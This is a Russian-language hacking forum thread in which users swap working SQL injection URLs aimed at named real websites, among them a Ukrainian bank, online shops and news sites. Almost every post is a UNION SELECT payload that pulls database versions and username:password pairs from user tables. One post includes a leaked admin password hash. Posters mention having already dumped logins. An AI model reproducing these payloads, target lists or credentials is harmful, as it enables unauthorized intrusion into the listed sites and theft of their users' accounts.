SQL Инъекции

PHP:

http://moskva.kotoroy.net/gallery2.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15/*

 

2 Ksander && VampiRUS
http://forum.antichat.ru/showpost.php?p=306621&postcount=883

login/pass выводил уже

 

_http://www.ournet.md/cgi/page.cgi?id=-1
улыбноло >)

 

не удержался
извините, если чей-то хоумпэйдж

Code:

http://emu-russia.km.ru/default.php?a=files&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3a,password),11,12,13,14,15+from+users

+upd:

Code:

http://www.hispanicprwire.com/news.php?l=in&id=-99+union+select+1,2,3,4,5,6,7,8,9/*

 

<noindex>
www.radabank.com.ua

Code:

http://www.radabank.com.ua/money/coin.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Версия 4.0.20




p.s.чет на банки проперло, хоть бы боком не вылезло Оо.

</noindex>

 

unixdoc.ru

Code:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-1

успешно натыкаемся на непохек
true:

Code:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=77+and+1=-1+union+select+1,2,3,4,5,6+from+information_schema.tables/*

 

Code:

http://www.tectonic.co.za/view.php?id=-1377+union+select+concat(username,0x3a,user_password),2+from+phpbb_users+order+by+2,1--

Code:

http://www.tectonic.co.za/view.php?id=-1377+union+select+concat(username,0x3a,password),2+from+users+order+by+2,1--

Code:

http://www.real-art.ru/shop.php?id=5555406+union+select+id+from+admin--

Code:

http://www.mks-ks.ru/shop/cat.php?id=-1173+union+select+1,2,3,convert(database()+using+cp1251)/*

Code:

http://www.8marta.ru/shop.php?id=-266+union+select+1,concat(name,0x3a,password),3,4,5,6,7,8,9,10+from+users+order+by+10,1/*

 

Code:

http://www.propro.ru/gallery/gallery.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

Code:

http://domoservice.ru/remont.php?catalog_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+users/*

 

Code:

http://www.tomhess.net/shop.php?id=-6+union+select+1,concat(name,0x3a,password),3+from+users/*

Code:

http://www.ueinternational.org/Mexico_info/mlna_articles.php?id=-85+union+select+1,database(),3,4,5,6,7,8,9--

 

там есть таблица livehelp_users но она находится в другой базе

 

такая же история
таблица users

 

может уже было...

Code:

http://www.afisha4u.ru/event.php?id=23&di=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

 

Code:

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,5/*

 

=\

 

Code:

http://www.theracersgroup.com/shop/car.php?id=-19+union+select+1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

 

http://www.freepoc.org/viewapp.php?id=-8+union+select+1,version(),3,4,5,6,7,8/*

 

Привет Spyder'у

Code:

http://www.bangkoknavi.com/shop/shop.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105+from+mysql.user/*

 

http://www.phparchitecture.com/howto_show.php?id=-5+union+select+1,2,version(),4,5

 

Code:

http://www.maldives.ru/perday.php?hid=-1+union+select+1,2,3,concat(username,0x3a,password)+from+users/*

admin:$1$Urvg1Snr$L6uDyha6v7XY5wMophhrN.

 

http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,version(),6